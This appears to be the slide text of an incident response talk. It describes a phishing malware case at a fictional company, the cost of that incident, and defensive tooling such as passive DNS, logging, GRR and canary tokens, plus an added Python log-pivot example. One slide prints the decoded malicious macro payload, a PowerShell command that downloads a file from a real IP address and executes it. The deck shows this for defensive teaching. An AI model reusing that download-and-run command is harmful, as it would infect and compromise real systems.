Up your Game
In the wake of Dear CEO
Who am I
• Security Team Lead @ Logicalis Jersey
• Incorporated Engineer (IEng) / Chartered IT professional (CITP)
• Channel Islands Information Security Forum (CIISF) founder
• Secretary British Computer Society Jersey
• My role is a mixture of offence and defence for clients of all
sizes and verticals, including forensic malware investigations.
How we got here
“We expect that registered persons will take appropriate steps
to properly manage their cyber security arrangements”
The Boards of Directors (or equivalent) of registered persons
will take overall responsibility for ensuring that their firm
adequately addresses cyber security risks.
A registered person should:
• Understand (and document) the risk of a cyber-attack on their business …
• Have in place appropriate contingency arrangements that they can deploy in
the event of a cyber attack
• Review these matters and test their effectiveness
5 Key Questions – Incident Response
[1] Can we determine how many hosts and when they
talked to the bad domain? How far can we go back in
time to check /prove this?
[2] What information do we have available to us? Logs?
Endpoint protection system?
[3] Did any of the affected hosts communicate with other
network systems? If they did, what occurred?
[4] How long did it take us to detect and remedy the
incident?
[5] What was the cost to the business?
Incident Response Stages
Preparation → Incident Identification → Eradication → Recovery → Lessons Learned
Without information, you cannot respond!
The more information you have, the better your response.
Effective incident response is about being able to pivot quickly and direct your response accordingly.
Meet Calculon Inc.
Offices and figures from the map on the slide:
Cayman = 50, BVI = 50 (100 in total; time = -5 hours)
Jersey = 180, Guernsey = 100, London = 20 (300 in total)
HK = 40, Kuala Lumpur = 30, Shanghai = 20 (90 in total; time = +8 hours)
Preparation - Threat Model
Threat | Vulnerability | Impact | Business Impact | Controls
Email Phishing | Social Engineering | Possible Compromise | System rebuild | Logging, Anti Virus
Malvertising Attack | Outdated Adobe Flash | Possible Compromise | System rebuild | Ad Blocker, Anti Virus
Web Attack against calculon.com | Vulnerability in web application stack | Website compromised | Reputational Loss | Keep website stack up to date
DDOS against calculon.com | Insufficient bandwidth | Website not available | Minor reputational loss | Consider DDOS protection
Preparation - Cyber kill chain
“You only have to be fooled once, be slow in reacting, just once. How are you going to be
sure to never make a mistake? You can't plan for that. That’s Life”
Incident – Malware Attack
Timeline (days 1 to 7, November 2016):
11/11/2016 Phishing email received
11/11/2016 System cleanup started
11/11/2016 Identify infected systems
11/11/2016 Delete Citrix user profiles
11/11/2016 Disconnect infected systems from network
11/11/2016 Delete email from Exchange server
11/11/2016 Inform BVI/Cayman of the attack
11/11/2016 - 11/14/2016 Rebuild infected systems
11/14/2016 Systems cleanup completed
11/14/2016 - 11/16/2016 Reporting
11/17/2016 Cost of incident
Incident – Malware attack
The malware has code hidden in an Excel spreadsheet. When decoded it becomes:
cmd /K PowerShell.exe (New-Object
System.Net.WebClient).DownloadFile('http://92.63.
88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%JIOiodf
hioIH.cab'); expand %TEMP%JIOiodfhioIH.cab
%TEMP%JIOiodfhioIH.exe; start
%TEMP%JIOiodfhioIH.exe;
VBA macro virus with hidden URL
Incident – Lessons Learned
[1] Insufficient logging available
[2] “Triage” took too long
[3] Lack of support skills in locations outside the UK
[4] Volatile forensic data lost
[5] USB / DLP / drive encryption made analysis difficult
[6] AV showed no infection / incident response tools showed no malicious processes
[7] Reporting took too long
Incident 1 – Business Cost
25 users clicked the phishing email: Citrix = 12; various locations (Jersey, Guernsey and London); a KL Calculon partner; an HK Calculon senior executive.
12 x Citrix Users - £150 per hour – 6 Hours = £3,600
9 x Citrix Users - £200 per hour – 10 Hours = £18,000
4 x Citrix Users - £400 per hour – 5 Hours = £8,000
IT support Costs = £2,000
Total Cost = £31,600
Improving Our Response – Passive DNS
https://blog.redcanary.com/2015/07/02/passive-dns-monitoring-your-ir-team-needs-it/
[1] Cheap to set up
[2] Use ‘Bro’ with Critical Stack Intel
https://nullsecure.org/building-your-own-passivedns-feed/
[3] Solves Question 1
Endpoint Logging
[1] Level One
• User logon / logoff events
• User account creation, deletion and modification
[2] Level Two
• Process creation / termination on systems
• Use of sensitive privileges
[3] Must Have
• Logs must be stored centrally – avoids anti-forensic clearing of logs
• Available for historic querying and hunting of suspicious activity
Endpoint Forensics
[1] Directly examine the memory
• Not susceptible to malware tampering.
• More information available – malware can’t hide.
[2] Scalability
• We need to be able to ask questions of systems remotely.
• Allows us to pivot and focus on what needs to “get done” in an incident.
[3] Memory Samples
• Contain information as well as disk artefacts.
• Existing “Live IR” tools are insufficient.
Threat Hunting = Endpoint Logging + Forensics + Netflow
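Questions 1 and 3 above, and the passive DNS plus netflow pivot this slide describes, worked as an added example that is not from the slides: it takes a Bro-style passive DNS extract and a netflow extract (both constructed), finds which hosts resolved the bad domain and when, reports how far back the DNS store reaches, and pivots to the internal systems each affected host contacted afterwards. The 10.0.0.0/8 internal range, the placeholder domain bad.example, the placeholder address 203.0.113.10 and the tab-separated field layout are assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed sample data, not real Calculon logs. Bro/Zeek-style dns.log
# columns: ts, id.orig_h, query, answers; bad.example and 203.0.113.10 are
# placeholder indicators and the timestamps fall on 11-12 November 2016.
DNS_LOG = """\
1478854800.10\t10.1.20.15\tbad.example\t203.0.113.10
1478854860.20\t10.1.20.22\tintranet.calculon.local\t10.1.5.10
1478855400.30\t10.1.20.22\tbad.example\t203.0.113.10
1478858000.40\t10.1.20.15\tbad.example\t203.0.113.10
1478940000.50\t10.2.30.7\tbad.example\t203.0.113.10
"""

# Constructed netflow extract, columns: ts, src, dst, dport, bytes.
FLOW_LOG = """\
1478854810.00\t10.1.20.15\t203.0.113.10\t80\t52110
1478854900.00\t10.1.20.15\t10.1.5.10\t445\t8800
1478855410.00\t10.1.20.22\t203.0.113.10\t80\t52110
1478855500.00\t10.1.20.22\t10.1.5.20\t3389\t120000
1478850000.00\t10.1.20.22\t10.1.5.10\t445\t300
1478940100.00\t10.2.30.7\t10.1.5.10\t445\t9100
1478940200.00\t10.3.1.9\t10.1.5.10\t445\t100
"""

# Assumption: Calculon's internal address space is 10.0.0.0/8.
INTERNAL_NET = ipaddress.ip_network("10.0.0.0/8")

def parse_tsv(text, fields):
    """Turn a tab-separated log extract into a list of dicts keyed by field."""
    return [dict(zip(fields, line.split("\t")))
            for line in text.splitlines() if line.strip() and not line.startswith("#")]

def hosts_that_resolved(dns_rows, bad_domain):
    """Question 1: hosts that looked up the bad domain, as
    host -> (first_seen, last_seen, lookup_count) in epoch seconds."""
    bad = bad_domain.lower().rstrip(".")
    seen = {}
    for r in dns_rows:
        if r["query"].lower().rstrip(".") != bad:
            continue
        ts, host = float(r["ts"]), r["orig_h"]
        first, last, n = seen.get(host, (ts, ts, 0))
        seen[host] = (min(first, ts), max(last, ts), n + 1)
    return seen

def lateral_contacts(flow_rows, affected):
    """Question 3: internal (dst, port) pairs each affected host contacted at or
    after its first lookup of the bad domain; earlier flows are pre-incident
    business traffic and are ignored."""
    out = defaultdict(set)
    for f in flow_rows:
        src = f["src"]
        if src not in affected or float(f["ts"]) < affected[src][0]:
            continue
        if ipaddress.ip_address(f["dst"]) not in INTERNAL_NET:
            continue
        out[src].add((f["dst"], int(f["dport"])))
    return dict(out)

def investigate(dns_text, flow_text, bad_domain):
    """Run the pivot end to end. retention_start answers 'how far back can we
    go': it is the oldest passive DNS record still held."""
    dns_rows = parse_tsv(dns_text, ("ts", "orig_h", "query", "answers"))
    flow_rows = parse_tsv(flow_text, ("ts", "src", "dst", "dport", "bytes"))
    affected = hosts_that_resolved(dns_rows, bad_domain)
    return {
        "retention_start": min(float(r["ts"]) for r in dns_rows) if dns_rows else None,
        "affected": affected,
        "lateral": lateral_contacts(flow_rows, affected),
    }

if __name__ == "__main__":
    result = investigate(DNS_LOG, FLOW_LOG, "bad.example")
    print("passive DNS retained since epoch", result["retention_start"])
    for host, (first, last, n) in sorted(result["affected"].items()):
        print(f"{host}: {n} lookup(s), first {first}, last {last}")
        for dst, port in sorted(result["lateral"].get(host, ())):
            print(f"  then contacted internal {dst}:{port}")
```

The pre-incident SMB flow from 10.1.20.22 is deliberately left out of the lateral list, which is the kind of noise that made the slide's "triage took too long" lesson expensive.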
ELK Stack Explained
ELK Demo
Google Rapid Response
• Cross-platform support for Linux, Mac OS X and Windows clients.
• Live remote memory analysis and imaging.
• Powerful search and download capabilities for files and the Windows registry.
• Secure communication infrastructure designed for Internet deployment.
• Detailed monitoring of client CPU, memory, IO usage and self-imposed limits.
https://github.com/google/grr
Reporting / Compliance
https://github.com/certsocietegenerale/FIR
• Python / Django web application
• Open sourced by the Societe Generale Incident Response Team
• Customisable and freely available for you to record your incidents in
• GPL v3 licensed – you can make changes for your own use
Canaries, Tokens and Honey Hashes
Canary Token: something you put on your network; if it is opened you get an email alert.
Canary Device: a honeypot with an internet console that mimics something else and raises alerts when accessed.
Honey Hash: a fake NTLM password hash that you put on critical servers to detect Pass-the-Hash attacks.
Integrating SIEM into your response
• Endpoint logging and forensics integrated via event collectors
• Threat intelligence feeds directly integrated into SIEM
• AV / next-gen AV supported
• Passive DNS integrated
Bridging the skills gap
Forensic Images:
http://www.forensicfocus.com/images-and-challenges
Volatility Framework:
http://volatility-labs.blogspot.com/
Incident Response:
http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
Questions
Can your organisation prevent, detect and
respond to cyber security threats that you face?
In an incident could you answer the five key
questions?
@cyberkryption

Incident Response in the wake of Dear CEO
